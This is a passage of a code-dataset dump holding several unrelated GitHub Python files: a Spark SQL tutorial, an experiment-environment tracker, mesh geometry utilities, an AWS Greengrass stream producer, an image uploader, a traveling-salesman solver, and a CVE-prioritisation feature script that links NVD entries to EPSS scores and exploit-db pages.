method to calculate summary statistics for the DataFrame and the show() method to display the results.\nquery = 'select males,females from census2010'\nsqlCtx.sql(query).describe().show()\n\n# step5\n### Read these additional datasets into DataFrame objects and then use the registerTempTable() function \n### to register these tables individually within SQLContext:\ndf_2000 = sqlCtx.read.json(\"census_2000.json\")\ndf_1990 = sqlCtx.read.json(\"census_1990.json\")\ndf_1980 = sqlCtx.read.json(\"census_1980.json\")\n\ndf_2000.registerTempTable('census2000')\ndf_1990.registerTempTable('census1990')\ndf_1980.registerTempTable('census1980')\ntables = sqlCtx.tableNames()\nprint(tables)\n\n# step6\n### Write a query that returns a DataFrame with the total columns for the tables census2010 and census2000 (in that order)\nquery = \"\"\"\n select census2010.total, census2000.total\n from census2010\n inner join census2000\n on census2010.age=census2000.age\n\"\"\"\n\nsqlCtx.sql(query).show()\n\n\n### The functions and operators from SQLite that we've used in the past are available for us to use in Spark SQL:\n\n### COUNT()\n### AVG()\n### SUM()\n### AND\n### OR\n\n\n\n# step7\n### Write a query that calculates the sums of the total column from each of the tables, in the following order\nquery = \"\"\"\n select sum(census2010.total), sum(census2000.total), sum(census1990.total)\n from census2010\n inner join census2000\n on census2010.age=census2000.age\n inner join census1990\n on census2010.age=census1990.age\n\"\"\"\nsqlCtx.sql(query).show()","repo_name":"jason-jz-zhu/dataquest","sub_path":"Data Scientist/Working With Large Datasets/Spark SQL.py","file_name":"Spark SQL.py","file_ext":"py","file_size_in_byte":2722,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"6603797416","text":"import os\n\nfrom daskperiment.backend import init_backend\nfrom daskperiment.core.errors import TrialIDNotFoundError\nfrom daskperiment.environment.platform import (PlatformEnvironment,\n DetailedCPUEnvironment)\nfrom daskperiment.environment.python import (PythonEnvironment,\n PythonPackagesEnvironment,\n NumPyEnvironment,\n SciPyEnvironment,\n PandasEnvironment,\n CondaEnvironment)\nfrom daskperiment.environment.git import GitEnvironment\nfrom daskperiment.util.log import get_logger\n\n\nlogger = get_logger(__name__)\n\n\nclass Environment(object):\n\n def __init__(self, backend):\n self.backend = init_backend(backend=backend)\n\n self.python = PythonEnvironment()\n self.python_packages = PythonPackagesEnvironment()\n\n self.collectors = [PlatformEnvironment(),\n DetailedCPUEnvironment(),\n self.python,\n NumPyEnvironment(),\n SciPyEnvironment(),\n PandasEnvironment(),\n CondaEnvironment(),\n GitEnvironment(),\n self.python_packages]\n self.mapping = {env.key: env for env in self.collectors}\n\n def keys(self):\n return [env.key for env in self.collectors]\n\n def log_environment_info(self):\n for env in self.collectors:\n for line in env.output_init():\n logger.info(line)\n\n def _load_single_environment(self, env, trial_id):\n \"\"\"\n Load single environment instance\n \"\"\"\n if trial_id is None:\n return env\n\n key = self.backend.get_environment_key(env.key, trial_id, env.ext)\n try:\n text = self.backend.load_text(key)\n except TrialIDNotFoundError:\n # overwrite message using trial_id\n raise TrialIDNotFoundError(trial_id)\n return env.loads(text)\n\n def check_environment_change(self, trial_id):\n for env in self.collectors:\n try:\n prev = self._load_single_environment(env, trial_id)\n except TrialIDNotFoundError:\n # file or db row may be deleted\n msg = ('Unable to load saved environment, '\n 'comparison is skipped: '\n '(key: {}, trial id: {})')\n logger.error(msg.format(env.key, trial_id))\n continue\n\n diff = env.difference_from(prev)\n if diff is not None:\n msg = \"Environment information has been changed: {}\"\n logger.warning(msg.format(env.key))\n for d in diff:\n logger.warning(d)\n\n def get_python_mode(self):\n return self.python.get_python_mode()\n\n def maybe_file(self):\n return self.python.maybe_file()\n\n def maybe_jupyter(self):\n return self.python.maybe_jupyter()\n\n def save(self, trial_id):\n for env in self.collectors:\n key = self.backend.get_environment_key(env.key, trial_id, env.ext)\n logger.debug('Saving {} info: {}'.format(env.key, key))\n self.backend.save_text(key, env.dumps())\n\n def get_environment(self, trial_id=None, category=None):\n if category is None:\n # compat for previous behaviour\n envs = [self.mapping['platform'],\n self.mapping['python'],\n self.mapping['git']]\n envs = [self._load_single_environment(e, trial_id=trial_id)\n for e in envs]\n lines = [os.linesep.join(e.output_init()) for e in envs]\n return os.linesep.join(lines)\n else:\n category = str(category).lower()\n\n try:\n env = self.mapping[category]\n except KeyError:\n msg = 'Category must be either {}, given: {}'\n msg = msg.format(','.format(self.mapping.keys()), category)\n raise ValueError(msg)\n\n try:\n env = self._load_single_environment(env, trial_id)\n except TrialIDNotFoundError:\n msg = ('Unable to load saved environment: '\n '(key: {}, trial id: {})')\n logger.error(msg.format(env.key, trial_id))\n raise\n return env.output_detail()\n\n def get_python_packages(self, trial_id=None):\n # TODO: deprecate?\n return self.get_environment(trial_id=trial_id,\n category='requirements')\n","repo_name":"sinhrks/daskperiment","sub_path":"daskperiment/environment/environment.py","file_name":"environment.py","file_ext":"py","file_size_in_byte":4802,"program_lang":"python","lang":"en","doc_type":"code","stars":24,"dataset":"github-code","pt":"34"} +{"seq_id":"40425011310","text":"import numpy as np\nimport multiprocessing\nfrom .util import compute_connected_average\nfrom .element import factory as element_factory\n\n__all__ = [\n \"compute_element_centers\",\n \"compute_edge_centers\",\n \"compute_face_centers\",\n \"compute_element_length\",\n \"compute_element_volumes\",\n \"compute_volume_averaged_elem_variable\",\n \"compute_node_volumes\",\n \"compute_node_variable_values_at_element_center\",\n]\n\n\ndef compute_element_centers(file, block_id=None, time_step=None):\n \"\"\"Computes the element geometric center.\n\n Parameters\n ----------\n block_id : int\n element block ID (not INDEX)\n time_step : int\n 1-based index of time step\n\n Returns\n -------\n centers : ndarray of float\n\n Note\n ----\n If `time_step` is not None, the center of the element displacement is computed\n\n \"\"\"\n if block_id is None:\n # compute centers for all blocks\n centers = []\n for id in file.get_element_block_ids():\n centers.append(compute_element_centers(file, id, time_step=time_step))\n return np.concatenate(centers, axis=0)\n else:\n conn = file.get_element_conn(block_id) - 1\n coords = file.get_coords(time_step=time_step)\n return compute_connected_average(conn, coords)\n\n\ndef compute_element_length(file, time):\n \"\"\"Calculate the characteristic element length.\n\n The length of a 3D element is the cube root of the volume; for a 2D element\n it is the square root of the area.\n\n The characteristic element length is the average element length over the mesh.\n \"\"\"\n\n time_step = file.get_time_step(time)\n\n ndim = file.num_dimensions()\n dexp = 1.0 / ndim\n\n length = 0.0\n for block_id in file.get_element_block_ids():\n vols = compute_element_volumes(file, block_id, time_step=time_step)\n length += np.sum(np.power(np.abs(vols), dexp))\n\n return length / file.num_elems()\n\n\ndef compute_edge_centers(file, block_id=None, time_step=None):\n \"\"\"Computes the edge geometric center.\n\n Parameters\n ----------\n block_id : int\n edge block ID (not INDEX)\n time_step : int\n 1-based index of time step\n\n Returns\n -------\n centers : ndarray of float\n\n Note\n ----\n If `time_step` is not None, the center of the edge displacement is computed\n\n \"\"\"\n if block_id is None:\n # compute centers for all blocks\n centers = []\n for id in file.get_edge_block_ids():\n centers.append(compute_edge_centers(file, id, time_step=time_step))\n return np.concatenate(centers, axis=0)\n else:\n conn = file.get_edge_block_conn(block_id) - 1\n coords = file.get_coords(time_step=time_step)\n return compute_connected_average(conn, coords)\n\n\ndef compute_face_centers(file, block_id=None, time_step=None):\n \"\"\"Computes the face geometric center.\n\n Parameters\n ----------\n block_id : int\n face block ID (not INDEX)\n time_step : int\n 1-based index of time step\n\n Returns\n -------\n centers : ndarray of float\n\n Note\n ----\n If `time_step` is not None, the center of the face displacement is computed\n\n \"\"\"\n if block_id is None:\n # compute centers for all blocks\n centers = []\n for id in file.get_face_block_ids():\n centers.append(compute_face_centers(file, id, time_step=time_step))\n return np.concatenate(centers, axis=0)\n else:\n conn = file.get_face_block_conn(block_id) - 1\n coords = file.get_coords(time_step=time_step)\n return compute_connected_average(conn, coords)\n\n\ndef compute_node_variable_values_at_element_center(\n file, block_id, var_name, time_step=None\n):\n \"\"\"Computes the value of a node variable at an element's center\n\n Parameters\n ----------\n block_id : int\n element block ID (not INDEX)\n var_name : str\n The nodal variable name\n time_step : int\n 1-based index of time step\n\n Returns\n -------\n data : ndarray of float\n\n \"\"\"\n if block_id is None:\n # compute for all blocks\n data = []\n for id in file.get_element_block_ids():\n x = compute_node_variable_values_at_element_center(\n file, id, var_name, time_step=time_step\n )\n data.append(x)\n return np.concatenate(data, axis=0)\n else:\n if var_name == \"coordinates\":\n nvars = file.get_coords()\n elif var_name == \"displacements\":\n nvars = file.get_displ(time_step)\n else:\n nvars = file.get_node_variable_values(var_name, time_step=time_step)\n conn = file.get_element_conn(block_id) - 1\n return compute_connected_average(conn, nvars)\n\n\ndef compute_node_volumes(file, time_step=None):\n \"\"\"Get the node volumes at the time index specified. The time index is\n 1-based. If provided, vol_array must be an array.array object of type\n storageType(), which is filled with the values; otherwise it is created.\"\"\"\n\n # Basic strategy: For each block, first get the element volumes\n # then distribute the element volumes to the nodes.\n vol = np.zeros(file.num_nodes())\n\n for block_id in file.get_element_block_ids():\n blk = file.get_element_block(block_id)\n\n nodes_per_i = 1.0 / blk.num_elem_nodes\n\n # Get the element volumes for a block, then partition the volume\n # to the element's nodes\n element_volumes = compute_element_volumes(file, block_id, time_step)\n\n conn = file.get_element_conn(block_id) - 1\n # Now, partition the element volume and distribute it to the nodes.\n for element in range(blk.num_block_elems):\n node_vol_part = nodes_per_i * element_volumes[element]\n vol[conn[element]] += node_vol_part\n\n return vol\n\n\ndef compute_volume_averaged_elem_variable(\n file, block_id, time_step, func, intervals=5, zfill=None, processes=None\n):\n \"\"\"Get the cell-average of a variable for block block_id at time_step.\n\n If the exoobj mesh is 2D and zfill is provided, zfill is appended to the x\n and y values in restructured_coords for all nodes.\n\n \"\"\"\n processes = processes or 1\n\n # Get the time that matches the solution time_index (which\n # might not be the same as the test_time)\n exact_time = file.get_time(time_step)\n\n elem_blk = file.get_element_block(block_id)\n elem_type = elem_blk.elem_type\n\n coord = file.get_coords(time_step=time_step)\n if file.num_dimensions() == 2 and zfill is not None:\n coord = np.column_stack((coord, np.zeros(coord.shape[0])))\n\n conn = file.get_element_conn(block_id) - 1\n if processes <= 2:\n averaged = _compute_ave(elem_type, func, exact_time, conn, coord, intervals)\n else:\n count = elem_blk.num_block_elems\n nproc = processes - 1\n pipes = [(None, None) for i in range(nproc)]\n procs = [None for i in range(nproc)]\n for procno in range(nproc):\n start = int((procno * count) / nproc)\n end = int(((procno + 1) * count) / nproc)\n pipes[procno] = multiprocessing.Pipe(False)\n p = multiprocessing.Process(\n target=_compute_ave,\n args=(\n elem_type,\n func,\n exact_time,\n conn[start:end],\n coord,\n intervals,\n pipes[procno][1],\n ),\n )\n procs[procno] = p\n p.start()\n averaged = np.zeros(count)\n for procno in range(nproc):\n p = procs[procno]\n start = int((procno * count) / nproc)\n end = int(((procno + 1) * count) / nproc)\n pipe = pipes[procno][0]\n averaged[start:end] = pipe.recv()\n pipe.close()\n p.join()\n\n return averaged\n\n\ndef _compute_ave(elem_type, fun, time, conn, coord, intervals, pipe=None):\n averaged = np.zeros(len(conn))\n for (iel, ix) in enumerate(conn):\n el = element_factory(elem_type, coord[ix])\n centers = el.subdiv(intervals)\n vols = el.subvols(intervals)\n exact = np.array([fun(x, time) for x in centers])\n averaged[iel] = np.sum(vols * exact) / np.sum(vols)\n if pipe is None:\n return averaged\n else:\n pipe.send(averaged)\n pipe.close()\n\n\ndef compute_element_volumes(file, block_id, time_step=None):\n \"\"\"Computes the element volumes.\n\n Parameters\n ----------\n block_id : int\n element block ID (not INDEX)\n time_step : int\n 1-based index of time step\n\n Returns\n -------\n volumes : ndarray of float\n\n Note\n ----\n If `time_step` is not None, the volume of the displaced element displacement\n\n \"\"\"\n coords = file.get_coords(time_step=time_step)\n elem_blk = file.get_element_block(block_id)\n efactory = lambda x: element_factory(elem_blk.elem_type, x)\n\n # Connectivity is 1 based\n conn = file.get_element_conn(block_id) - 1\n\n # Now, compute the volumes.\n vol = np.zeros(elem_blk.num_block_elems)\n for (iel, ix) in enumerate(conn):\n el = efactory(coords[ix])\n vol[iel] = el.volume\n\n return vol\n","repo_name":"sandialabs/exodusii","sub_path":"exodusii/extension.py","file_name":"extension.py","file_ext":"py","file_size_in_byte":9247,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"34"} +{"seq_id":"70174980897","text":"# Greengrass lambda source - stream producer\n\nimport os\nimport json\nimport logging\nimport greengrasssdk\nfrom greengrasssdk.stream_manager import (\n StreamManagerClient,\n ReadMessagesOptions,\n NotEnoughMessagesException,\n MessageStreamDefinition,\n StrategyOnFull,\n ExportDefinition,\n IoTAnalyticsConfig,\n InvalidRequestException,\n StreamManagerException,\n Persistence,\n)\n\n# Configure logger\nlogger = logging.getLogger()\nlogger.setLevel(logging.INFO)\n\nchannel_name = os.environ[\"STREAM_MANAGER_CHANNEL\"]\nclient = StreamManagerClient()\n\n\ntry:\n # The LocalDataStream is low priority source for incoming sensor data and\n # aggregator function. \n client.create_message_stream(\n MessageStreamDefinition(\n name=\"LocalDataStream\", # Required.\n max_size=268435456, # Default is 256 MB.\n stream_segment_size=16777216, # Default is 16 MB.\n time_to_live_millis=None, # By default, no TTL is enabled.\n strategy_on_full=StrategyOnFull.OverwriteOldestData, # Required.\n persistence=Persistence.File, # Default is File.\n flush_on_write=False, # Default is false.\n export_definition=ExportDefinition(\n iot_analytics=[\n IoTAnalyticsConfig(\n identifier=\"RawData\",\n iot_channel=channel_name,\n # iot_msg_id_prefix=\"test\",\n # batch_size=1,\n # batch_interval_millis=1000,\n # priority=1\n )\n ]\n ),\n )\n )\nexcept StreamManagerException as e:\n logger.error(f\"Error creating message stream: {e}\")\n pass\nexcept Exception as e:\n logger.error(f\"General exception error: {e}\")\n pass\n\ndef main(event, context):\n \"\"\"Invoked per incoming message\n \n This function is invoked everytime a message is placed on an MQTT\n topic where this function is the target. It simply places the data\n onto the LocalDataStream.\n\n Args:\n event (bytes): UTF-8 encoded byte stream (binary)\n context (dict): Mirrors cloud Lambda (unused) \n \"\"\"\n\n logger.info(f\"Event data is: {event}\")\n try:\n # Incoming event is already byte encoded\n client.append_message(stream_name=\"LocalDataStream\", data=event)\n except Exception as e:\n logger.error(f\"Error appending: {e}\")\n return\n","repo_name":"awslabs/aws-iot-greengrass-accelerators","sub_path":"v1/stream_manager/cdk/lambda-gg-stream-producer/lambda_code/stream_producer.py","file_name":"stream_producer.py","file_ext":"py","file_size_in_byte":2461,"program_lang":"python","lang":"en","doc_type":"code","stars":67,"dataset":"github-code","pt":"34"} +{"seq_id":"28309646870","text":"import http.client\nimport mimetypes\nimport os\nfrom typing import Tuple, Union\nfrom urllib import parse\nfrom pprint import pprint\nimport argparse\n\n\nclass ImageUploaderError(Exception):\n pass\n\n\nclass ImageUploader:\n IMG_EXT = {\".gif\", \".jpeg\", \".jpg\", \".png\", \".svg\"}\n\n def __init__(self, url, img_dir):\n self.url = parse.urlparse(url)\n self.img_dir = img_dir\n self.conn = http.client.HTTPSConnection if self.url.scheme == \"https\" else http.client.HTTPConnection\n\n def _get_mimetype(self, img: str) -> str:\n return mimetypes.types_map[os.path.splitext(img)[1]]\n\n def _get_file(self, img: str) -> Tuple[bytes, str]:\n try:\n with open(img, \"rb\") as f:\n return f.read(), self._get_mimetype(img)\n except OSError as err:\n raise ImageUploaderError(f\"Can't open file: {err}\")\n\n def _get_connection(self) -> Union[http.client.HTTPConnection, http.client.HTTPSConnection]:\n try:\n return self.conn(self.url.netloc)\n except http.client.HTTPException as err:\n pprint(f\"Can't connect to resource: {err}\")\n exit(1)\n\n def _upload(self, img: str):\n try:\n payload, mimetype = self._get_file(img)\n except ImageUploaderError as err:\n pprint(err)\n return\n headers = {\n 'Content-Type': mimetype,\n 'Content-Disposition': f'attachment; filename={os.path.split(img)[1]}'\n }\n\n connection = self._get_connection()\n connection.request(\"POST\", \"/images\", payload, headers)\n try:\n r = connection.getresponse()\n except ConnectionResetError as err:\n pprint(f\"Response error while uploading {img}: {err}\")\n return\n if r.status != 200:\n pprint(f\"Can't upload file {img}, resource response: {r.read()}\")\n return\n pprint(f'File {img} successfully uploaded!')\n\n def _get_images_from_dir(self) -> list:\n return [os.path.join(self.img_dir, img) for img in os.listdir(self.img_dir)\n if os.path.splitext(img)[1] in self.IMG_EXT]\n\n def upload(self):\n if not os.path.isdir(self.img_dir):\n pprint(f\"It's not a directory: {self.img_dir}\")\n exit(1)\n images = self._get_images_from_dir()\n for i in images:\n self._upload(i)\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument('--server', type=str, nargs='?', required=True)\n parser.add_argument('--dir', type=str, nargs=\"?\", required=True)\n args = parser.parse_args()\n uploader = ImageUploader(args.server, args.dir)\n uploader.upload()\n","repo_name":"GeorgeS1995/nlogic_testtask","sub_path":"image_uploader.py","file_name":"image_uploader.py","file_ext":"py","file_size_in_byte":2697,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"2331641639","text":"numeros = [20,34,53,5,24,55,36,87]\r\nprint(\"pares\")\r\n\r\nfor numero in numeros:\r\n if numero % 2 ==0:\r\n print (numero)\r\n\r\nprint(\"\\nimpares\")\r\ni = 0\r\nwhile(i < len(numeros)):\r\n if numeros[i] % 2 == 1:\r\n print(numeros[i])\r\n i += 1","repo_name":"Vera3588/UPB-001","sub_path":"ClasesUpb/Clases/Clase 5/ciclos.py","file_name":"ciclos.py","file_ext":"py","file_size_in_byte":247,"program_lang":"python","lang":"it","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"82957702","text":"'''\n******* 문제 푼 후 느낀 것 *********\n그냥 다른 그래프 문제는 끝까지 가서 가능한지 확인하는 것이기 때문에\n방문한 곳을 공통적으로 체크하면서 나가면 된다. \n\n하지만 백트래킹 같은 경우에는 다시 돌아오고, 지났던 곳을 빼고 다시 가야하기 떄문에 이전에 넣었던 것을 빼는 작업이 필요하다.\n\n이때 이전에 풀어보았던 늑대 문제가 있는데, 늑대 문제는 늑대들을 계속 데리고 다닌다. 트리의 반대로 올라가도 늑대가 사라지지 않는다.\n그래서 deepcopy 를 이용하여 visited를 관리하고, 늑대를 다시 빼주는 작업을 하지 않았다. \n\n하지만 여기서는 뒤로 돌아가면 방문했던 내역이 사라지기 때문에 deepcopy를 쓰지 않아도 되고, 뒤로 돌아오면 다시이를 빼주는 작업을 수행해야한다.\n'''\n\n'''\n2022/05/23\nboj.kr/10971\n외판원 순회 2\n\n문제 :\n외판원 순회 문제는 영어로 Traveling Salesman problem (TSP) 라고 불리는 문제로 computer science 분야에서 가장 중요하게 취급되는 문제 중 하나이다.\n여러 가지 변종 문제가 있으나, 여기서는 가장 일반적인 형태의 문제를 살펴보자.\n\n1번부터 N번까지 번호가 매겨져 있는 도시들이 있고, 도시들 사이에는 길이 있다. (길이 없을 수도 있다)\n이제 한 외판원이 어느 한 도시에서 출발해 N개의 도시를 모두 거쳐 다시 원래의 도시로 돌아오는 순회 여행 경로를 계획하려고 한다. 단, 한 번 갔던 도시로는 다시 갈 수 없다.\n(맨 마지막에 여행을 출발했던 도시로 돌아오는 것은 예외) 이런 여행 경로는 여러 가지가 있을 수 있는데, 가장 적은 비용을 들이는 여행 계���을 세우고자 한다.\n\n각 도시간에 이동하는데 드는 비용은 행렬 W[i][j]형태로 주어진다. W[i][j]는 도시 i에서 도시 j로 가기 위한 비용을 나타낸다.\n비용은 대칭적이지 않다. 즉, W[i][j] 는 W[j][i]와 다를 수 있다. 모든 도시간의 비용은 양의 정수이다. W[i][i]는 항상 0이다.\n경우에 따라서 도시 i에서 도시 j로 갈 수 없는 경우도 있으며 이럴 경우 W[i][j]=0이라고 하자.\n\nN과 비용 행렬이 주어졌을 때, 가장 적은 비용을 들이는 외판원의 순회 여행 경로를 구하는 프로그램을 작성하시오.\n\n입력 :\n첫째 줄에 도시의 수 N이 주어진다. (2 ≤ N ≤ 10) 다음 N개의 줄에는 비용 행렬이 주어진다. 각 행렬의 성분은 1,000,000 이하의 양의 정수이며,\n갈 수 없는 경우는 0이 주어진다. W[i][j]는 도시 i에서 j로 가기 위한 비용을 나타낸다.\n\n항상 순회할 수 있는 경우만 입력으로 주어진다.\n\n결과 :\n첫째 줄에 외판원의 순회에 필요한 최소 비용을 출력한다.\n'''\n\nimport sys\nimport copy\ninput = sys.stdin.readline\n\nn = int(input())\n\ngraph = [[] for _ in range(n)]\n\nfor i in range(n):\n graph[i] = list(map(int, input().split()))\n\nmin_value = 9999999999\n\n\ndef dfs(start, fix_start, count, visited, value):\n global min_value\n print(visited)\n if count == n:\n if start == fix_start:\n min_value = min(min_value, value)\n return\n elif value > min_value:\n return\n else:\n for i in range(len(graph[start])):\n # 가중치가 0이 아니고, 방문하지 않은 경우에만\n if graph[start][i] != 0 and visited[i] == False:\n visited[i] = True\n dfs(i, fix_start, count+1,\n visited, value+graph[start][i])\n visited[i] = False\n\n\nfor i in range(n):\n visited = [False for _ in range(n)]\n dfs(i, i, 0, visited, 0)\n\nprint(min_value)\n","repo_name":"P3RP/daily-algorithm-test","sub_path":"kty/baekjoon/10971.py","file_name":"10971.py","file_ext":"py","file_size_in_byte":3805,"program_lang":"python","lang":"ko","doc_type":"code","stars":2,"dataset":"github-code","pt":"34"} +{"seq_id":"4422834102","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Aug 13 05:13:54 2022\n\n@author: Arman Hossain\n\"\"\"\n\n# ! pip install pyexploitdb\n\nimport pandas as pd\n\nfrom df_utilities import add_columns_to_df\nfrom pyExploitDb import PyExploitDb\nfrom utilities import read_csv_dataset\nfrom nvd_downloader import download_data\nfrom merging_16_22_databases import merge_all\n# from epss_top_vendors_prods import generate_top_vendor_prod\nimport gzip\nfrom PyQt5.QtWidgets import (\n QApplication)\n\nclass P_ven_prod():\n def __init__(self,cpe_series):\n self.cpe_series = cpe_series\n self.vendors = []\n self.prods = []\n self.vendor_df = pd.DataFrame()\n self.prod_df = pd.DataFrame()\n self.vendor_info = {}\n \n def perse(self,top_vendors,top_prods):\n '''\n this will add columns vendors from top_vendors and prods from top_prds with respect to all cve ids.\n example:\n id microsoft chrome\n 1 5 6\n 2 0 0 [because cve-2 is do not affect microsoft or chorme]\n\n '''\n \n lst = self.cpe_series.values.tolist()\n # vendor_lst1 = ['microsoft','adobe','ibm','hp','apache','apple','linux','oracle','opensuse','cisco','huawei','canonical','redhat','debian']\n # vendor_lst = ['microsoft','adobe','ibm','hp','apache','apple','google']\n df = pd.DataFrame()\n # for vendor in vendor_lst:\n # df[vendor] = [0]*len(cpe_series)\n \n index = 0\n for item in lst:\n if(not isinstance(item, str)):\n index+=1\n continue\n cpe_lst = item.split('#arman#')\n \n for a_cpe in cpe_lst:\n a_cpe_sp = a_cpe.split(':')\n vendor= a_cpe_sp[3]\n prod = vendor+\"_\"+a_cpe_sp[4]\n if vendor not in self.vendors:\n self.vendors.append(vendor)\n if vendor in top_vendors.index:\n self.vendor_df[vendor] = [0]*len(self.cpe_series)\n if vendor in top_vendors.index:\n self.vendor_df[vendor][index] = top_vendors['count'][vendor]\n \n # if prod not in self.prods:\n # self.prods.append(prod)\n # if prod in top_prods.index:\n # self.prod_df[prod] = [0]*len(self.cpe_series)\n # if prod in top_prods.index:\n # self.prod_df[prod][index] = top_prods['count'][prod]\n \n \n index+=1\n def gen_vendor_info(self):\n \n '''\n will provide all the vendors and count in dataset cpe2uri\n microsoft 34234\n juniper 234\n ...\n '''\n \n lst = self.cpe_series.values.tolist()\n index = 0\n for item in lst:\n if(not isinstance(item, str)):\n index+=1\n continue\n cpe_lst = item.split('#arman#')\n for a_cpe in cpe_lst:\n a_cpe_sp = a_cpe.split(':')\n vendor= a_cpe_sp[3]\n \n if vendor not in self.vendor_info.keys():\n self.vendor_info[vendor] = 0\n self.vendor_info[vendor] += 1\n \n index+=1\n \n return pd.DataFrame.from_dict(self.vendor_info, orient='index') \n \n \n \n # def gen_vendor_info2(self):\n # lst = self.cpe_series.values.tolist()\n # index = 0\n # for item in lst:\n # if(not isinstance(item, str)):\n # index+=1\n # continue\n # cpe_lst = item.split('#arman#')\n # temp_list = []\n # for a_cpe in cpe_lst:\n # a_cpe_sp = a_cpe.split(':')\n # vendor= a_cpe_sp[3]\n \n # if vendor not in self.vendor_info.keys():\n # self.vendor_info[vendor] = 0\n # if(vendor):\n # self.vendor_info[vendor] += 1\n \n # index+=1\n \n # return pd.DataFrame.from_dict(self.vendor_info, orient='index')\n \n\n\n\n \n\ndef count_ref(ref_source):\n \n lst = ref_source.values.tolist()\n df = pd.DataFrame()\n df['ref_count'] = [0]*len(ref_source)\n \n index = 0\n for item in lst:\n if(not isinstance(item, str)): # if None\n index+=1\n continue\n refcnt = len(item.split('#arman#'))\n \n df['ref_count'][index] = refcnt\n index+=1\n \n return df\n \n\n# def exploit():\n# expltlst = ['poc_code','weaponized']\n# return 0\n\n\ndef tags_poc_from_exploit_db(cve_id_series):\n \n # taglst = ['remote','dos','webapps','local'] # 'code_execution','memory_corruption' not in exploitdb\n taglst = [] # 'code_execution','memory_corruption' not in exploitdb\n pEdb = PyExploitDb()\n pEdb.debug = False\n pEdb.openFile()\n \n df = pd.DataFrame()\n # for tag in taglst:\n # df[tag] = [0]*len(cve_id_series)\n \n # df['poc_code'] = [0]*len(cve_id_series) \n df['code_link'] = [None]*len(cve_id_series) \n \n index = 0\n for id in cve_id_series: \n results = pEdb.searchCve(id)\n # results = pEdb.searchCve('CVE-2018-14592')\n # results = pEdb.searchCve('CVE-2021-1167')\n if (results==[] or type(results) != dict):\n index+=1\n continue\n else:\n # df['poc_code'][index] = 1\n df['code_link'][index] = results['exploit']\n # if(\"tag_\"+results['platform'] not in taglst):\n # taglst.append(\"tag_\"+results['platform'])\n # df[\"tag_\"+results['platform']] = [0]*len(cve_id_series)\n # df[\"tag_\"+results['platform']][index] = 1\n \n \n index+=1\n \n \n return df\n \n\n\ndef get_epss(data):\n data[\"epss\"] = [0]*len(data)\n \n epss = ''\n with gzip.open('./downloaded/epss_scores-current.csv.gz') as f:\n epss = pd.read_csv(f)\n epss.columns = ['epss', 'percentile']\n for id in epss.index:\n if id in data.index:\n score = epss['epss'][id]\n data['epss'][id] = score\n return data\n\ndef get_exploitdb(total_df,isExcel=True):\n exploit = pd.read_csv('./downloaded/files_exploits.csv')\n # exploit.codes[0].split(';')[0].find('CVE')\n idx = 0\n for idd in exploit.codes:\n QApplication.processEvents()\n if type(idd) == float:\n idx+=1\n continue\n for code in idd.split(';'):\n if code.find('CVE') ==0:\n if code in total_df.index:\n QApplication.processEvents()\n if isExcel: \n # total_df['code_link'][code] = 'https://gitlab.com/exploit-database/exploitdb/-/tree/main/'+exploit.file[idx]\n if type(total_df['code_link'][code]) != str:\n total_df['code_link'][code] = 'https://exploit-db.com/exploits/'+str(exploit.id[idx])\n else:\n total_df['code_link'][code] += '; '+'https://exploit-db.com/exploits/'+str(exploit.id[idx])\n total_df['code_link_count'][code] += 1\n idx+=1\n \n return total_df\n\ndef generate(data,top_vend,top_prod):\n \n total_df = pd.DataFrame()\n total_df['ID'] = data['ID']\n \n\n vendor_product_perser = P_ven_prod(data['cpe23Uri'])\n vendor_product_perser.perse(top_vend,top_prod)\n total_df = add_columns_to_df(total_df, vendor_product_perser.vendor_df)\n \n ref_cnt_df = count_ref(data['refsource'])\n total_df = add_columns_to_df(total_df, ref_cnt_df)\n \n # tag_poc_df = tags_poc_from_exploit_db(data['ID'])\n # total_df = add_columns_to_df(total_df, tag_poc_df)\n \n total_df.index = total_df[\"ID\"]\n total_df.drop('ID', inplace=True, axis=1)\n\n total_df['code_link_count'] = [0]*len(total_df) \n total_df = get_exploitdb(total_df,False)\n \n total_df = get_epss(total_df)\n # total_df.to_csv(\"166_22_desc_filtered_data.csv\",index=False)\n \n return total_df\n\ndef generate_for_ui(data):\n \n total_df = pd.DataFrame()\n total_df['ID'] = data['ID']\n \n total_df = add_columns_to_df(total_df, data['description'],'description')\n total_df = add_columns_to_df(total_df, data['url'],'url')\n \n \n \n ref_cnt_df = count_ref(data['refsource'])\n total_df = add_columns_to_df(total_df, ref_cnt_df)\n \n total_df = add_columns_to_df(total_df, data['tags'],'tags')\n total_df = add_columns_to_df(total_df, data['cpe23Uri'],'cpeUri')\n total_df = add_columns_to_df(total_df, data['vectorString'],'vectorString_v31')\n total_df = add_columns_to_df(total_df, data['vectorString_v2'],\"vectorString_v2\")\n total_df = add_columns_to_df(total_df, data['baseScore'],'CVSS_v31')\n total_df = add_columns_to_df(total_df, data['baseScore_v2'],'CVSS_v2')\n total_df = add_columns_to_df(total_df, data['publishedDate'],'publishedDate')\n # total_df = add_columns_to_df(total_df, data['epss'],'epss')\n \n # data['CVSS31'] = mdata['baseScore']\n # data['CVSS2'] = mdata['baseScore_v2']\n \n # tag_poc_df = tags_poc_from_exploit_db(data['ID'])\n # total_df = add_columns_to_df(total_df, tag_poc_df)\n \n total_df.index = total_df[\"ID\"]\n total_df.drop('ID', inplace=True, axis=1)\n \n total_df['code_link'] = [None]*len(total_df)\n total_df['code_link_count'] = [0]*len(total_df)\n total_df = get_exploitdb(total_df)\n \n \n total_df = get_epss(total_df)\n \n return total_df\n\ndef dataforexcel():\n data = read_csv_dataset('./data/2002_22_nvd.csv')\n excel_data = generate_for_ui(data) \n excel_data.to_csv('./data/data_for_excel.csv')\n \ndef epss_thesholding(data,a=0.00949,b=0.019):\n \n # a = 0.00949\n # b = 0.019\n \n l = len(data[data['epss']<= a])/len(data)\n r = len(data[data['epss']>= b])/len(data)\n m = 1-l-r\n print('a: ',a,' b: ',b)\n print('epss: ','low rating-',l,'medium rating-',m,'critical rating-',r)\n \n for id in data.index:\n if data['epss'][id] <= a:\n data['epss'][id] = 1\n elif data['epss'][id] < b:\n data['epss'][id] = 2\n else:\n data['epss'][id] = 3\n return 